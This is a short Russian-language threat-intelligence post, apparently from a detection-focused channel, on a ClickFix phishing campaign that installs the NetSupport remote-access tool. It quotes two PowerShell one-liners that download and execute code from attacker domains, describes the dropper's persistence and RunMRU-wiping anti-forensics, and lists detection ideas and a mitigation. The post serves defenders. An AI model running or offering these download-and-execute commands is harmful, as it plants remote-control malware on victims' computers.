Очередная атака начинается с фишинга
ClickFix для доставки RMM NetSupportПользователям предлагается выполнить одну из команд:
"PowerShell.exe" -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j"
"PowerShell.exe" -w h -nop -c "&('iex') (New-Object IO.StreamReader([Net.WebRequest]::Create('https://xunira[.]cloud/C[.]GRE').GetResponse().GetResponseStream())).ReadToEnd()"
В отчете отлично расписан функционал загружаемого PS1:
🔤Декодированние base64 и преобразование его в JSON.
JSON устроен интересно ключ - это список в котором каждая запись содержит два ключа имя файла и содержимое файла в base64, например:
{"MLh0b": [{"Heg": "client32.exe", "VnZv":"TVqQAAMAA"}]}
🔤Создает скрытый системный каталог для дропера в
C:\Users\Public\{\w\d+}🔤Декодириует ключи JSON и записывает в скрытую папку
🔤Закрепляется с помощью ярлыка в папке
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup🔤Проверяет, что все файлы, связанные с NetSupport, успешно записаны на диск
🔤Запускает клиент NetSupport, в данном случае он называется
client32.exeВ другой кампании у PS1 появился функционал антифорензики - удаление ключей
RunMRU
Remove-ItemProperty -Path- 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue
🔭 Обнаружение:
🔤 Обнаружение командлетов
Powershell Get-Random, FromBase64String, System.Text.Encoding, Attributes, Wscript.Shell, CreateShortcut
🔤 Создание файлов и директорий в
C:\Users\Public\ , в исключение можно добавить explorer.exe🔤 создание скриптами файлов в
%APPDATA%\Microsoft\Windows\Start 🔤 удаление ключей реестра из
HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUP.S. не замечал в других отчетах рекомендации по отключению диалогого окна
ВыполнитьUser Configuration > Administrative Templates > Start Menu and Taskbar > Enable “Remove Run menu from Start Menu”
#detection@detectioneasy
#ttp@detectioneasy